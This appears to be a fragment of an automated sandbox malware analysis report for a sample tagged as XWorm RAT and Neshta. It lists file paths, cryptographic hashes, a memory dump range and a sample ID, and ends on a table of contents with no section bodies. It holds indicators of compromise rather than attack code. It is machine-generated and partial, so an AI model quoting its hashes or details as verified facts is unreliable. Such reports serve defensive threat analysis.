C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\4B33FB012A2D26607E54B30B4788C864

MD5	bf797ec9dd273a5a42e89d385e7a8bf9
SHA1	a1f08d30c4a4515944aa8e59b6d01e50c0a4f58a
SHA256	03db62638d80d64cb7c7bcaf18a78e20155f195684c4fdaca9665043201d193b
SHA512	83a8ce97858c8d4672bba83689e17c852434fbe49383a0aafc242d43b6d1a55567ec82cba20dbcd5e5cb5cc2b12d54b3d223dae172fb0f2ac6a6682063222b83

memory/3240-6454-0x0000000001400000-0x0000000001474000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\3582-490\wab.exe

MD5	72ad21d191b58842334d32a381ea7fa8
SHA1	f7375f09855a7bce9f7a152c75e84aac69caf828
SHA256	87abfab7bf5e213fc9e63c7fa39edfa6452eb5f7fdd668cd370d9cf4ea3ef729
SHA512	78662231c7ce0d03374b69dfd32614786dc5bf0c8ad2baadf2143f42bb03bd378632cc457dc414aa7e3d284674cc9151c39f90d71d9a5dd15dba689b2283386d

C:\PROGRA~2\Adobe\ACROBA~1\Reader\ACROTE~1.EXE

MD5	0a1704e48ff603332eaac935608d3cf1
SHA1	e138d3d481c054a89b85312bfddd2f8a0baf8c1b
SHA256	d9e02af7b220e25f385c71e0a3be4b83203e0673cc1e56fcf02d3e1f0f3774b6
SHA512	7cec7a7c5542e66e347381e9ab5572b2231ab11dac61d9a76bcb7cbd4bd1e86f8169e7840c2e69f93e686cc1834e52cd6b47817b760ea618139a3de64076314f

Sample ID	240522-cg7kgaha7w
Target	a4615f641630183fb06937c4f82fbdeb1f38a61b0cce7476a2c5df3aef749336.exe
SHA256	a4615f641630183fb06937c4f82fbdeb1f38a61b0cce7476a2c5df3aef749336
Tags	xworm rat trojan neshta persistence spyware

Malware Analysis Report

2024-09-11 03:19

Table of Contents

Analysis Overview

Threat Level: Known bad

Malicious Activity Summary

MITRE ATT&CK Matrix V13

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files